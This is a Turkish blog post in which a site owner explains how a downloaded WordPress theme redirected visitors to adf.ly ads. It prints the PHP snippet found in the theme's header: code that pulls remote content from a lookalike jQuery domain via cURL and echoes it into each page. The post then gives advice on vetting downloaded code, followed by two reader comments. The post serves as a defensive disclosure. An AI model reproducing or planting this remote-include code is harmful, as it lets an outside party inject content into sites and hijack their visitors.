Bugün blog, kısa bir süreliğine (yaklaşık 2 dakika) ziyaretçi geldikçe kazandıran adf.ly reklamlarına yönlendi. Sorunun daha önceden indirdiğim temadan kaynaklandığını fark edip hemen temayı değiştirdim. Bu bahaneyle yeni, daha beğeneceğim bir tema arayım dedim. 4 tane olur gibi görünen tema buldum ama uygulamada hiç tatmin edici değildi. Düzenlemem gereken çok yerleri var diye düşünürken aslında kullandığım temanın benim için ne kadar güzel bir seçim olduğunu farkettim. Bari temanın kıllık yapma nedenini bulup düzelteyim dedim.
Temayı tekrar aktif hale getirip, yönlenmeye sebep olan kodu buldum. <!DOCTYPE html> üzerinde iki adet iframe görünüyordu. Yerinden dolayı sorunun header bölümünü içeren dosyadan kaynaklanacağı anlaşıldı. Koda baktığımda şöyle bir şey vardı:
<?php
if(function_exists('curl_init'))
{
$url = "http://www.j-query.org/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
?>
İlk bakışta “ha bu jquery include ediyor, sorun başka yerde” gibi görünebilir ama olay bariz burada. Adrese dikkatli bakılınca j-query.org ama bunun orijinali jquery.org! Sitenin görünümünü benzetmiyor ama phishing sayılır mı? Bence sayılır :) Orijinal olsa zaten efendi efendi <script> ile alır, cURL yapmaya gerek yok ki bunun için..
Adam bunu sürekli include ettiriyor, zamanı geldiğinde de include edilen adresi güncelleyip, kodu her kullanan siteyi, hatta onların her kullanıcılarını istediği adrese yönlendiriyor. DDoS atak tadında.. Yönlendirdiği yer de ziyaret başına para kazandıran bir yer olunca kazanılan para güzel olmasına rağmen kazanılış şekli kötü oluyor.
Peki “kod indirirken nelere dikkat etmek gerekir?” diye sorabilirsiniz. Maalesef kodun tamamını kontrol etme gibi bir şansınız yok.
- Öncelikle ne indirdiğinize dikkat etmelisiniz. Örnek olarak: “Facebook profilinize kimler bakmış?” gibi sitenin imkanı olmadan yapılma olasılıkları zor olan şeylerden uzak durun. Yani gerçek olamayacak kadar güzel fırsatlara temkinli yaklaşmanız yararınıza olacaktır.
- Sonrasında gerçekte ne indirdiğinize dikkat etmelisiniz. İndireceğiniz dosyanın adını ve uzantısını tekrar kontrol etmek gerekir.
- Daha da önemlisi; Nereden indirdiğinize dikkat edin. Bu biraz, tanımadığınız kişilerden dosya kabul etmemek, biraz da bebeğinize mama olarak daha önce hiç adını duymadığınız bir markayı neredeyse bedava diye almak gibi..
Sonuç olarak; kod diyip geçmeyin, indirdiğiniz koda dikkat edin.
Merhabalar, web sitemde böyle bir sorun yaşıyorum. Ancak çözemedim. Yardımcı olabilir misiniz?
Çok teşekkürler, her bulduğun temaya atlamamak lazımmış onu öğrendik.. :)